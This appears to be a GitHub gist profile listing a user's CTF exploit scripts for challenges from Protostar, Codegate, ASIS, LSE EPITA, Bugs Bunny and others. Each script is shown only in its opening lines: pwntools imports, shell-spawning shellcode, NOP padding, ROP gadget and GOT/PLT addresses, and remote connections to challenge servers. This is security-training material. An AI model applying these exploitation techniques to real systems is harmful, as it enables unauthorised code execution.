Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / stack7.py
Created February 25, 2017 16:08
Protostar - satck7
from pwn import *
jmp2heap = 0x804a008
SC = asm(shellcraft.sh())
def pwny(s,addr,shellcode):
payload = ""
payload += shellcode
payload += "\x90"*35
@0xPwny
0xPwny / sandboxed.py
Created February 25, 2017 16:10
OwaspCTF 2017 - AppSec Africa - PWN 200 SandBoxed!
#!/usr/bin/python
#OWASPCTF 2017
#sandboxed exploit Code
import itertools,string,hashlib
import time,sys
from pwn import *
@0xPwny
0xPwny / mint.py
Last active March 13, 2017 20:50
Xiomara CTF - PWN 200pts
#!/usr/bin/python
from pwn import *
#Author : Abdeljalil Nouiri
# Xiorama CTF - PWN 200 Mint
"""
#LOCAL
sysoff = 0x00040310
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Tiny Panel 50 pts
from pwn import *
import sys
username = "admin"
@0xPwny
0xPwny / pwn100.py
Created March 13, 2017 10:09
LSE CTF smash stack - 100 pts
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Smash Stack 100pts
from pwn import *
import sys
cmd = 0x8049dc8
@0xPwny
0xPwny / babypwn.py
Created May 5, 2017 18:42
BabyPwn - Codegate 2017 - exploit
#!/usr/bin/python
from pwn import *
import time
pop2ret = 0x8048b84
pop4ret = 0x8048eec
sendGOT = 0x0804b064
sendPLT = 0x08048700
@0xPwny
0xPwny / overflow1.py
Created May 19, 2017 21:10
LSE EPITA - overflow1 exploit
#!/usr/bin/python
# 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag
from pwn import *
import sys
#con = process("./overflow")
con = remote(sys.argv[1],sys.argv[2])
@0xPwny
0xPwny / asis_start.py
Created May 23, 2017 02:50
ASIS CTF Quals 2017 - Start - pwnable
#!/usr/bin/python
from pwn import *
from littlepwny import *
#con = remote(sys.argv[1],int(sys.argv[2]))
con = process("./START")
shellcode = Scode("x64")
readplt = 0x0000000000400400
@0xPwny
0xPwny / pwn100.py
Created July 31, 2017 11:15
Bugs Bunny CTF 2017 - PWN100
#!/usr/bin/python
#Bugs_Bunny CTF 2017
from pwn import *
r = remote("54.153.19.139",5252)
ret = 0x804b028
@0xPwny
0xPwny / pwn150.py
Created July 31, 2017 11:18
Bugs Bunny CTF 2017 - PWN150
#!/usr/bin/python
#Bugs_Bunny CTF 2017
from pwn import *
#r = process("./pwn150")
#raw_input()
r =remote("54.153.19.139",5253)